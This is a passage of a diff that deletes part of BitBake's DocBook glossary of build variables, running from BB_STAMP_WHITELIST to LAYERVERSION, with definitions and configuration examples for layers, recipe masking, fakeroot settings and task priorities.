-                            </para></listitem>
-                        <listitem><para><emphasis>whitelist</emphasis> -
-                            Identical to "full" mode except timestamp
-                            comparisons are made for recipes listed in the
-                            <link linkend='var-bb-BB_STAMP_WHITELIST'><filename>BB_STAMP_WHITELIST</filename></link>
-                            variable.
-                            </para></listitem>
-                    </itemizedlist>
-                    <note>
-                        Stamp policies are largely obsolete with the
-                        introduction of setscene tasks.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_STAMP_WHITELIST'><glossterm>BB_STAMP_WHITELIST</glossterm>
-            <glossdef>
-                <para>
-                    Lists files whose stamp file timestamps are compared when
-                    the stamp policy mode is set to "whitelist".
-                    For information on stamp policies, see the
-                    <link linkend='var-bb-BB_STAMP_POLICY'><filename>BB_STAMP_POLICY</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_STRICT_CHECKSUM'><glossterm>BB_STRICT_CHECKSUM</glossterm>
-            <glossdef>
-                <para>
-                    Sets a more strict checksum mechanism for non-local URLs.
-                    Setting this variable to a value causes BitBake
-                    to report an error if it encounters a non-local URL
-                    that does not have at least one checksum specified.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_TASK_IONICE_LEVEL'><glossterm>BB_TASK_IONICE_LEVEL</glossterm>
-            <glossdef>
-                <para>
-                    Allows adjustment of a task's Input/Output priority.
-                    During Autobuilder testing, random failures can occur
-                    for tasks due to I/O starvation.
-                    These failures occur during various QEMU runtime timeouts.
-                    You can use the <filename>BB_TASK_IONICE_LEVEL</filename>
-                    variable to adjust the I/O priority of these tasks.
-                    <note>
-                        This variable works similarly to the
-                        <link linkend='var-bb-BB_TASK_NICE_LEVEL'><filename>BB_TASK_NICE_LEVEL</filename></link>
-                        variable except with a task's I/O priorities.
-                    </note>
-                </para>
-
-                <para>
-                    Set the variable as follows:
-                    <literallayout class='monospaced'>
-     BB_TASK_IONICE_LEVEL = "<replaceable>class</replaceable>.<replaceable>prio</replaceable>"
-                    </literallayout>
-                    For <replaceable>class</replaceable>, the default value is
-                    "2", which is a best effort.
-                    You can use "1" for realtime and "3" for idle.
-                    If you want to use realtime, you must have superuser
-                    privileges.
-                </para>
-
-                <para>
-                    For <replaceable>prio</replaceable>, you can use any
-                    value from "0", which is the highest priority, to "7",
-                    which is the lowest.
-                    The default value is "4".
-                    You do not need any special privileges to use this range
-                    of priority values.
-                    <note>
-                        In order for your I/O priority settings to take effect,
-                        you need the Completely Fair Queuing (CFQ) Scheduler
-                        selected for the backing block device.
-                        To select the scheduler, use the following command form
-                        where <replaceable>device</replaceable> is the device
-                        (e.g. sda, sdb, and so forth):
-                        <literallayout class='monospaced'>
-      $ sudo sh -c “echo cfq > /sys/block/<replaceable>device</replaceable>/queu/scheduler
-                        </literallayout>
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_TASK_NICE_LEVEL'><glossterm>BB_TASK_NICE_LEVEL</glossterm>
-            <glossdef>
-                <para>
-                    Allows specific tasks to change their priority
-                    (i.e. nice level).
-                </para>
-
-                <para>
-                    You can use this variable in combination with task
-                    overrides to raise or lower priorities of specific tasks.
-                    For example, on the
-                    <ulink url='http://www.yoctoproject.org'>Yocto Project</ulink>
-                    autobuilder, QEMU emulation in images is given a higher
-                    priority as compared to build tasks to ensure that images
-                    do not suffer timeouts on loaded systems.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_TASKHASH'><glossterm>BB_TASKHASH</glossterm>
-            <glossdef>
-                <para>
-                    Within an executing task, this variable holds the hash
-                    of the task as returned by the currently enabled
-                    signature generator.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_VERBOSE_LOGS'><glossterm>BB_VERBOSE_LOGS</glossterm>
-            <glossdef>
-                <para>
-                    Controls how verbose BitBake is during builds.
-                    If set, shell scripts echo commands and shell script output
-                    appears on standard out (stdout).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BB_WORKERCONTEXT'><glossterm>BB_WORKERCONTEXT</glossterm>
-            <glossdef>
-                <para>
-                    Specifies if the current context is executing a task.
-                    BitBake sets this variable to "1" when a task is
-                    being executed.
-                    The value is not set when the task is in server context
-                    during parsing or event handling.
-                </para>
-            </glossdef>
-        </glossentry>
-
-
-        <glossentry id='var-bb-BBCLASSEXTEND'><glossterm>BBCLASSEXTEND</glossterm>
-            <glossdef>
-                <para>
-                    Allows you to extend a recipe so that it builds variants
-                    of the software.
-                    Some examples of these variants for recipes from the
-                    OpenEmbedded-Core metadata are "natives" such as
-                    <filename>quilt-native</filename>, which is a copy of
-                    Quilt built to run on the build system; "crosses" such
-                    as <filename>gcc-cross</filename>, which is a compiler
-                    built to run on the build machine but produces binaries
-                    that run on the target <filename>MACHINE</filename>;
-                    "nativesdk", which targets the SDK machine instead of
-                    <filename>MACHINE</filename>; and "mulitlibs" in the form
-                    "<filename>multilib:</filename><replaceable>multilib_name</replaceable>".
-                </para>
-
-                <para>
-                    To build a different variant of the recipe with a minimal
-                    amount of code, it usually is as simple as adding the
-                    variable to your recipe.
-                    Here are two examples.
-                    The "native" variants are from the OpenEmbedded-Core
-                    metadata:
-                    <literallayout class='monospaced'>
-     BBCLASSEXTEND =+ "native nativesdk"
-     BBCLASSEXTEND =+ "multilib:<replaceable>multilib_name</replaceable>"
-                    </literallayout>
-                    <note>
-                        <para>
-                        Internally, the <filename>BBCLASSEXTEND</filename>
-                        mechanism generates recipe variants by rewriting
-                        variable values and applying overrides such as
-                        <filename>_class-native</filename>.
-                        For example, to generate a native version of a recipe,
-                        a
-                        <link linkend='var-bb-DEPENDS'><filename>DEPENDS</filename></link>
-                        on "foo" is rewritten to a <filename>DEPENDS</filename>
-                        on "foo-native".
-                        </para>
-
-                        <para>
-                        Even when using <filename>BBCLASSEXTEND</filename>, the
-                        recipe is only parsed once.
-                        Parsing once adds some limitations.
-                        For example, it is not possible to
-                        include a different file depending on the variant,
-                        since <filename>include</filename> statements are
-                        processed when the recipe is parsed.
-                        </para>
-                    </note>
-                </para>
-             </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BBDEBUG'><glossterm>BBDEBUG</glossterm>
-            <glossdef>
-                <para>
-                    Sets the BitBake debug output level to a specific value
-                    as incremented by the <filename>-D</filename> command line
-                    option.
-                    <note>
-                        You must set this variable in the external environment
-                        in order for it to work.
-                    </note>
-                </para>
-             </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BBFILE_COLLECTIONS'><glossterm>BBFILE_COLLECTIONS</glossterm>
-            <glossdef>
-                <para>Lists the names of configured layers.
-                    These names are used to find the other <filename>BBFILE_*</filename>
-                    variables.
-                    Typically, each layer appends its name to this variable in its
-                    <filename>conf/layer.conf</filename> file.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BBFILE_PATTERN'><glossterm>BBFILE_PATTERN</glossterm>
-            <glossdef>
-                <para>Variable that expands to match files from
-                    <link linkend='var-bb-BBFILES'><filename>BBFILES</filename></link>
-                    in a particular layer.
-                    This variable is used in the <filename>conf/layer.conf</filename> file and must
-                    be suffixed with the name of the specific layer (e.g.
-                    <filename>BBFILE_PATTERN_emenlow</filename>).</para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BBFILE_PRIORITY'><glossterm>BBFILE_PRIORITY</glossterm>
-            <glossdef>
-                <para>Assigns the priority for recipe files in each layer.</para>
-                <para>This variable is useful in situations where the same recipe appears in
-                    more than one layer.
-                    Setting this variable allows you to prioritize a
-                    layer against other layers that contain the same recipe - effectively
-                    letting you control the precedence for the multiple layers.
-                    The precedence established through this variable stands regardless of a
-                    recipe's version
-                    (<link linkend='var-bb-PV'><filename>PV</filename></link> variable).
-                    For example, a layer that has a recipe with a higher <filename>PV</filename> value but for
-                    which the <filename>BBFILE_PRIORITY</filename> is set to have a lower precedence still has a
-                    lower precedence.</para>
-                <para>A larger value for the <filename>BBFILE_PRIORITY</filename> variable results in a higher
-                    precedence.
-                    For example, the value 6 has a higher precedence than the value 5.
-                    If not specified, the <filename>BBFILE_PRIORITY</filename> variable is set based on layer
-                    dependencies (see the
-                    <filename><link linkend='var-bb-LAYERDEPENDS'>LAYERDEPENDS</link></filename> variable for
-                    more information.
-                    The default priority, if unspecified
-                    for a layer with no dependencies, is the lowest defined priority + 1
-                    (or 1 if no priorities are defined).</para>
-                <tip>
-                    You can use the command <filename>bitbake-layers show-layers</filename> to list
-                    all configured layers along with their priorities.
-                </tip>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BBFILES'><glossterm>BBFILES</glossterm>
-            <glossdef>
-                <para>
-                    A space-separated list of recipe files BitBake uses to
-                    build software.
-                </para>
-
-                <para>
-                    When specifying recipe files, you can pattern match using
-                    Python's
-                    <ulink url='https://docs.python.org/3/library/glob.html'><filename>glob</filename></ulink>
-                    syntax.
-                    For details on the syntax, see the documentation by
-                    following the previous link.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BBFILES_DYNAMIC'><glossterm>BBFILES_DYNAMIC</glossterm>
-            <info>
-                BBFILES_DYNAMIC[doc] = "Activates content depending on presence of identified layers."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Activates content depending on presence of identified layers.
-                    You identify the layers by the collections that the layers
-                    define.
-                </para>
-
-                <para>
-                    Use the <filename>BBFILES_DYNAMIC</filename> variable to
-                    avoid <filename>.bbappend</filename> files whose
-                    corresponding <filename>.bb</filename> file is in a layer
-                    that attempts to modify other layers through
-                    <filename>.bbappend</filename> but does not want to
-                    introduce a hard dependency on those other layers.
-                </para>
-
-                <para>
-                    Additionally you can prefix the rule with "!" to add 
-                    <filename>.bbappend</filename> and <filename>.bb</filename> files
-                    in case a layer is not present.
-                    Use this avoid hard dependency on those other layers.
-                </para>
-
-                <para>
-                    Use the following form for
-                    <filename>BBFILES_DYNAMIC</filename>:
-                    <literallayout class='monospaced'>
-                        <replaceable>collection_name</replaceable>:<replaceable>filename_pattern</replaceable>
-                    </literallayout>
-                    The following example identifies two collection names and
-                    two filename patterns:
-                    <literallayout class='monospaced'>
-                        BBFILES_DYNAMIC += "\
-                            clang-layer:${LAYERDIR}/bbappends/meta-clang/*/*/*.bbappend \
-                            core:${LAYERDIR}/bbappends/openembedded-core/meta/*/*/*.bbappend \
-                        "
-                    </literallayout>
-                    When the collection name is prefixed with "!" it will add the file pattern in case
-                    the layer is absent:
-                    <literallayout class='monospaced'>
-                        BBFILES_DYNAMIC += "\
-                            !clang-layer:${LAYERDIR}/backfill/meta-clang/*/*/*.bb \
-                        "
-                    </literallayout>
-                    
-                    This next example shows an error message that occurs
-                    because invalid entries are found, which cause parsing to
-                    abort:
-                    <literallayout class='monospaced'>
-                    ERROR: BBFILES_DYNAMIC entries must be of the form {!}&lt;collection name&gt;:&lt;filename pattern&gt;, not:
-                        /work/my-layer/bbappends/meta-security-isafw/*/*/*.bbappend
-                        /work/my-layer/bbappends/openembedded-core/meta/*/*/*.bbappend
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BBINCLUDED'><glossterm>BBINCLUDED</glossterm>
-            <glossdef>
-                <para>
-                    Contains a space-separated list of all of all files that
-                    BitBake's parser included during parsing of the current
-                    file.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BBINCLUDELOGS'><glossterm>BBINCLUDELOGS</glossterm>
-            <glossdef>
-                <para>
-                    If set to a value, enables printing the task log when
-                    reporting a failed task.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BBINCLUDELOGS_LINES'><glossterm>BBINCLUDELOGS_LINES</glossterm>
-            <glossdef>
-                <para>
-                    If
-                    <link linkend='var-bb-BBINCLUDELOGS'><filename>BBINCLUDELOGS</filename></link>
-                    is set, specifies the maximum number of lines from the
-                    task log file to print when reporting a failed task.
-                    If you do not set <filename>BBINCLUDELOGS_LINES</filename>,
-                    the entire log is printed.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BBLAYERS'><glossterm>BBLAYERS</glossterm>
-            <glossdef>
-                <para>Lists the layers to enable during the build.
-                    This variable is defined in the <filename>bblayers.conf</filename> configuration
-                    file in the build directory.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     BBLAYERS = " \
-       /home/scottrif/poky/meta \
-       /home/scottrif/poky/meta-yocto \
-       /home/scottrif/poky/meta-yocto-bsp \
-       /home/scottrif/poky/meta-mykernel \
-       "
-
-                    </literallayout>
-                    This example enables four layers, one of which is a custom, user-defined layer
-                    named <filename>meta-mykernel</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BBLAYERS_FETCH_DIR'><glossterm>BBLAYERS_FETCH_DIR</glossterm>
-            <glossdef>
-                <para>
-                    Sets the base location where layers are stored.
-                    This setting is used in conjunction with
-                    <filename>bitbake-layers layerindex-fetch</filename> and
-                    tells <filename>bitbake-layers</filename> where to place
-                    the fetched layers.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BBMASK'><glossterm>BBMASK</glossterm>
-            <glossdef>
-                <para>
-                    Prevents BitBake from processing recipes and recipe
-                    append files.
-                </para>
-
-                <para>
-                    You can use the <filename>BBMASK</filename> variable
-                    to "hide" these <filename>.bb</filename> and
-                    <filename>.bbappend</filename> files.
-                    BitBake ignores any recipe or recipe append files that
-                    match any of the expressions.
-                    It is as if BitBake does not see them at all.
-                    Consequently, matching files are not parsed or otherwise
-                    used by BitBake.
-                </para>
-
-                <para>
-                    The values you provide are passed to Python's regular
-                    expression compiler.
-                    Consequently, the syntax follows Python's Regular
-                    Expression (re) syntax.
-                    The expressions are compared against the full paths to
-                    the files.
-                    For complete syntax information, see Python's
-                    documentation at
-                    <ulink url='http://docs.python.org/3/library/re.html#re'></ulink>.
-                </para>
-
-                <para>
-                    The following example uses a complete regular expression
-                    to tell BitBake to ignore all recipe and recipe append
-                    files in the <filename>meta-ti/recipes-misc/</filename>
-                    directory:
-                    <literallayout class='monospaced'>
-     BBMASK = "meta-ti/recipes-misc/"
-                    </literallayout>
-                    If you want to mask out multiple directories or recipes,
-                    you can specify multiple regular expression fragments.
-                    This next example masks out multiple directories and
-                    individual recipes:
-                    <literallayout class='monospaced'>
-     BBMASK += "/meta-ti/recipes-misc/ meta-ti/recipes-ti/packagegroup/"
-     BBMASK += "/meta-oe/recipes-support/"
-     BBMASK += "/meta-foo/.*/openldap"
-     BBMASK += "opencv.*\.bbappend"
-     BBMASK += "lzma"
-                    </literallayout>
-                    <note>
-                        When specifying a directory name, use the trailing
-                        slash character to ensure you match just that directory
-                        name.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BBMULTICONFIG'><glossterm>BBMULTICONFIG</glossterm>
-            <info>
-                BBMULTICONFIG[doc] = "Enables BitBake to perform multiple configuration builds and lists each separate configuration (multiconfig)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-<!--                <para role="glossdeffirst"><imagedata fileref="figures/define-generic.png" /> -->
-                    Enables BitBake to perform multiple configuration builds
-                    and lists each separate configuration (multiconfig).
-                    You can use this variable to cause BitBake to build
-                    multiple targets where each target has a separate
-                    configuration.
-                    Define <filename>BBMULTICONFIG</filename> in your
-                    <filename>conf/local.conf</filename> configuration file.
-                </para>
-
-                <para>
-                    As an example, the following line specifies three
-                    multiconfigs, each having a separate configuration file:
-                    <literallayout class='monospaced'>
-     BBMULTIFONFIG = "configA configB configC"
-                    </literallayout>
-                    Each configuration file you use must reside in the
-                    build directory within a directory named
-                    <filename>conf/multiconfig</filename> (e.g.
-                    <replaceable>build_directory</replaceable><filename>/conf/multiconfig/configA.conf</filename>).
-                </para>
-
-                <para>
-                    For information on how to use
-                    <filename>BBMULTICONFIG</filename> in an environment that
-                    supports building targets with multiple configurations,
-                    see the
-                    "<link linkend='executing-a-multiple-configuration-build'>Executing a Multiple Configuration Build</link>"
-                    section.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BBPATH'><glossterm>BBPATH</glossterm>
-            <glossdef>
-                <para>
-                    Used by BitBake to locate class
-                    (<filename>.bbclass</filename>) and configuration
-                    (<filename>.conf</filename>) files.
-                    This variable is analogous to the
-                    <filename>PATH</filename> variable.
-                </para>
-
-                <para>
-                    If you run BitBake from a directory outside of the
-                    build directory,
-                    you must be sure to set
-                    <filename>BBPATH</filename> to point to the
-                    build directory.
-                    Set the variable as you would any environment variable
-                    and then run BitBake:
-                    <literallayout class='monospaced'>
-     $ BBPATH="<replaceable>build_directory</replaceable>"
-     $ export BBPATH
-     $ bitbake <replaceable>target</replaceable>
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BBSERVER'><glossterm>BBSERVER</glossterm>
-            <glossdef>
-                <para>
-                    Points to the server that runs memory-resident BitBake.
-                    The variable is only used when you employ memory-resident
-                    BitBake.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BBTARGETS'><glossterm>BBTARGETS</glossterm>
-            <glossdef>
-                <para>
-                    Allows you to use a configuration file to add to the list
-                    of command-line target recipes you want to build.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BBVERSIONS'><glossterm>BBVERSIONS</glossterm>
-            <glossdef>
-                <para>
-                    Allows a single recipe to build multiple versions of a
-                    project from a single recipe file.
-                    You also able to specify conditional metadata
-                    using the
-                    <link linkend='var-bb-OVERRIDES'><filename>OVERRIDES</filename></link>
-                    mechanism for a single version or for an optionally named
-                    range of versions.
-                </para>
-
-                <para>
-                    For more information on <filename>BBVERSIONS</filename>,
-                    see the
-                    "<link linkend='variants-class-extension-mechanism'>Variants - Class Extension Mechanism</link>"
-                    section.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BITBAKE_UI'><glossterm>BITBAKE_UI</glossterm>
-            <glossdef>
-                <para>
-                    Used to specify the UI module to use when running BitBake.
-                    Using this variable is equivalent to using the
-                    <filename>-u</filename> command-line option.
-                    <note>
-                        You must set this variable in the external environment
-                        in order for it to work.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BUILDNAME'><glossterm>BUILDNAME</glossterm>
-            <glossdef>
-                <para>
-                    A name assigned to the build.
-                    The name defaults to a datetime stamp of when the build was
-                    started but can be defined by the metadata.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-BZRDIR'><glossterm>BZRDIR</glossterm>
-            <glossdef>
-                <para>
-                    The directory in which files checked out of a Bazaar
-                    system are stored.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-bb-glossary-c'><title>C</title>
-
-        <glossentry id='var-bb-CACHE'><glossterm>CACHE</glossterm>
-            <glossdef>
-                <para>
-                    Specifies the directory BitBake uses to store a cache
-                    of the metadata so it does not need to be parsed every
-                    time BitBake is started.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-CVSDIR'><glossterm>CVSDIR</glossterm>
-            <glossdef>
-                <para>
-                    The directory in which files checked out under the
-                    CVS system are stored.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-bb-glossary-d'><title>D</title>
-
-        <glossentry id='var-bb-DEFAULT_PREFERENCE'><glossterm>DEFAULT_PREFERENCE</glossterm>
-            <glossdef>
-                <para>
-                    Specifies a weak bias for recipe selection priority.
-                </para>
-                <para>
-                    The most common usage of this is variable is to set
-                    it to "-1" within a recipe for a development version of a
-                    piece of software.
-                    Using the variable in this way causes the stable version
-                    of the recipe to build by default in the absence of
-                    <filename><link linkend='var-bb-PREFERRED_VERSION'>PREFERRED_VERSION</link></filename>
-                    being used to build the development version.
-                </para>
-                <note>
-                    The bias provided by <filename>DEFAULT_PREFERENCE</filename>
-                    is weak and is overridden by
-                    <filename><link linkend='var-bb-BBFILE_PRIORITY'>BBFILE_PRIORITY</link></filename>
-                    if that variable is different between two layers
-                    that contain different versions of the same recipe.
-                </note>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-DEPENDS'><glossterm>DEPENDS</glossterm>
-            <glossdef>
-                <para>
-                    Lists a recipe's build-time dependencies
-                    (i.e. other recipe files).
-                </para>
-
-                <para>
-                    Consider this simple example for two recipes named "a" and
-                    "b" that produce similarly named packages.
-                    In this example, the <filename>DEPENDS</filename>
-                    statement appears in the "a" recipe:
-                    <literallayout class='monospaced'>
-     DEPENDS = "b"
-                    </literallayout>
-                    Here, the dependency is such that the
-                    <filename>do_configure</filename> task for recipe "a"
-                    depends on the <filename>do_populate_sysroot</filename>
-                    task of recipe "b".
-                    This means anything that recipe "b" puts into sysroot
-                    is available when recipe "a" is configuring itself.
-                </para>
-
-                <para>
-                    For information on runtime dependencies, see the
-                    <link linkend='var-bb-RDEPENDS'><filename>RDEPENDS</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-DESCRIPTION'><glossterm>DESCRIPTION</glossterm>
-            <glossdef>
-                <para>
-                    A long description for the recipe.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-DL_DIR'><glossterm>DL_DIR</glossterm>
-            <glossdef>
-                <para>
-                    The central download directory used by the build process to
-                    store downloads.
-                    By default, <filename>DL_DIR</filename> gets files
-                    suitable for mirroring for everything except Git
-                    repositories.
-                    If you want tarballs of Git repositories, use the
-                    <link linkend='var-bb-BB_GENERATE_MIRROR_TARBALLS'><filename>BB_GENERATE_MIRROR_TARBALLS</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-
-        </glossentry>
-    </glossdiv>
-
-    <glossdiv id='var-bb-glossary-e'><title>E</title>
-
-        <glossentry id='var-bb-EXCLUDE_FROM_WORLD'><glossterm>EXCLUDE_FROM_WORLD</glossterm>
-            <glossdef>
-                <para>
-                    Directs BitBake to exclude a recipe from world builds (i.e.
-                    <filename>bitbake world</filename>).
-                    During world builds, BitBake locates, parses and builds all
-                    recipes found in every layer exposed in the
-                    <filename>bblayers.conf</filename> configuration file.
-                </para>
-
-                <para>
-                    To exclude a recipe from a world build using this variable,
-                    set the variable to "1" in the recipe.
-                </para>
-
-                <note>
-                    Recipes added to <filename>EXCLUDE_FROM_WORLD</filename>
-                    may still be built during a world build in order to satisfy
-                    dependencies of other recipes.
-                    Adding a recipe to <filename>EXCLUDE_FROM_WORLD</filename>
-                    only ensures that the recipe is not explicitly added
-                    to the list of build targets in a world build.
-                </note>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-bb-glossary-f'><title>F</title>
-
-        <glossentry id='var-bb-FAKEROOT'><glossterm>FAKEROOT</glossterm>
-            <glossdef>
-                <para>
-                     Contains the command to use when running a shell script
-                     in a fakeroot environment.
-                     The <filename>FAKEROOT</filename> variable is obsolete
-                     and has been replaced by the other
-                     <filename>FAKEROOT*</filename> variables.
-                     See these entries in the glossary for more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-FAKEROOTBASEENV'><glossterm>FAKEROOTBASEENV</glossterm>
-            <glossdef>
-                <para>
-                     Lists environment variables to set when executing
-                     the command defined by
-                     <link linkend='var-bb-FAKEROOTCMD'><filename>FAKEROOTCMD</filename></link>
-                     that starts the bitbake-worker process
-                     in the fakeroot environment.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-FAKEROOTCMD'><glossterm>FAKEROOTCMD</glossterm>
-            <glossdef>
-                <para>
-                     Contains the command that starts the bitbake-worker
-                     process in the fakeroot environment.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-FAKEROOTDIRS'><glossterm>FAKEROOTDIRS</glossterm>
-            <glossdef>
-                <para>
-                     Lists directories to create before running a task in
-                     the fakeroot environment.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-FAKEROOTENV'><glossterm>FAKEROOTENV</glossterm>
-            <glossdef>
-                <para>
-                     Lists environment variables to set when running a task
-                     in the fakeroot environment.
-                     For additional information on environment variables and
-                     the fakeroot environment, see the
-                     <link linkend='var-bb-FAKEROOTBASEENV'><filename>FAKEROOTBASEENV</filename></link>
-                     variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-FAKEROOTNOENV'><glossterm>FAKEROOTNOENV</glossterm>
-            <glossdef>
-                <para>
-                     Lists environment variables to set when running a task
-                     that is not in the fakeroot environment.
-                     For additional information on environment variables and
-                     the fakeroot environment, see the
-                     <link linkend='var-bb-FAKEROOTENV'><filename>FAKEROOTENV</filename></link>
-                     variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-FETCHCMD'><glossterm>FETCHCMD</glossterm>
-            <glossdef>
-                <para>
-                    Defines the command the BitBake fetcher module
-                    executes when running fetch operations.
-                    You need to use an override suffix when you use the
-                    variable (e.g. <filename>FETCHCMD_git</filename>
-                    or <filename>FETCHCMD_svn</filename>).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-FILE'><glossterm>FILE</glossterm>
-            <glossdef>
-                <para>
-                    Points at the current file.
-                    BitBake sets this variable during the parsing process
-                    to identify the file being parsed.
-                    BitBake also sets this variable when a recipe is being
-                    executed to identify the recipe file.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-FILESPATH'><glossterm>FILESPATH</glossterm>
-            <glossdef>
-                <para>
-                    Specifies directories BitBake uses when searching for
-                    patches and files.
-                    The "local" fetcher module uses these directories when
-                    handling <filename>file://</filename> URLs.
-                    The variable behaves like a shell <filename>PATH</filename>
-                    environment variable.
-                    The value is a colon-separated list of directories that
-                    are searched left-to-right in order.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-
-    <glossdiv id='var-bb-glossary-g'><title>G</title>
-
-        <glossentry id='var-bb-GITDIR'><glossterm>GITDIR</glossterm>
-            <glossdef>
-                <para>
-                    The directory in which a local copy of a Git repository
-                    is stored when it is cloned.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-
-    <glossdiv id='var-bb-glossary-h'><title>H</title>
-
-        <glossentry id='var-bb-HGDIR'><glossterm>HGDIR</glossterm>
-            <glossdef>
-                <para>
-                    The directory in which files checked out of a Mercurial
-                    system are stored.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-HOMEPAGE'><glossterm>HOMEPAGE</glossterm>
-            <glossdef>
-                <para>Website where more information about the software the recipe is building
-                    can be found.</para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-bb-glossary-i'><title>I</title>
-
-        <glossentry id='var-bb-INHERIT'><glossterm>INHERIT</glossterm>
-            <glossdef>
-                <para>
-                    Causes the named class or classes to be inherited globally.
-                    Anonymous functions in the class or classes
-                    are not executed for the
-                    base configuration and in each individual recipe.
-                    The OpenEmbedded build system ignores changes to
-                    <filename>INHERIT</filename> in individual recipes.
-                </para>
-
-                <para>
-                    For more information on <filename>INHERIT</filename>, see
-                    the
-                    "<link linkend="inherit-configuration-directive"><filename>INHERIT</filename> Configuration Directive</link>"
-                    section.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-<!--
-    <glossdiv id='var-glossary-j'><title>J</title>
-    </glossdiv>
-
-    <glossdiv id='var-glossary-k'><title>K</title>
-    </glossdiv>
--->
-
-    <glossdiv id='var-bb-glossary-l'><title>L</title>
-
-        <glossentry id='var-bb-LAYERDEPENDS'><glossterm>LAYERDEPENDS</glossterm>
-            <glossdef>
-                <para>Lists the layers, separated by spaces, upon which this recipe depends.
-                    Optionally, you can specify a specific layer version for a dependency
-                    by adding it to the end of the layer name with a colon, (e.g. "anotherlayer:3"
-                    to be compared against
-                    <link linkend='var-bb-LAYERVERSION'><filename>LAYERVERSION</filename></link><filename>_anotherlayer</filename>
-                    in this case).
-                    BitBake produces an error if any dependency is missing or
-                    the version numbers do not match exactly (if specified).</para>
-                <para>
-                    You use this variable in the <filename>conf/layer.conf</filename> file.
-                    You must also use the specific layer name as a suffix
-                    to the variable (e.g. <filename>LAYERDEPENDS_mylayer</filename>).</para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-LAYERDIR'><glossterm>LAYERDIR</glossterm>
-            <glossdef>
-                <para>When used inside the <filename>layer.conf</filename> configuration
-                    file, this variable provides the path of the current layer.
-                    This variable is not available outside of <filename>layer.conf</filename>
-                    and references are expanded immediately when parsing of the file completes.</para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-LAYERDIR_RE'><glossterm>LAYERDIR_RE</glossterm>
-            <glossdef>
-                <para>When used inside the <filename>layer.conf</filename> configuration
-                    file, this variable provides the path of the current layer,
-                    escaped for use in a regular expression
-                    (<link linkend='var-bb-BBFILE_PATTERN'><filename>BBFILE_PATTERN</filename></link>).
-                    This variable is not available outside of <filename>layer.conf</filename>
-                    and references are expanded immediately when parsing of the file completes.</para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-LAYERVERSION'><glossterm>LAYERVERSION</glossterm>
-            <glossdef>
-                <para>Optionally specifies the version of a layer as a single number.
-                    You can use this variable within
-                    <link linkend='var-bb-LAYERDEPENDS'><filename>LAYERDEPENDS</filename></link>
-                    for another layer in order to depend on a specific version
-                    of the layer.</para>
-                <para>
-                    You use this variable in the <filename>conf/layer.conf</filename> file.
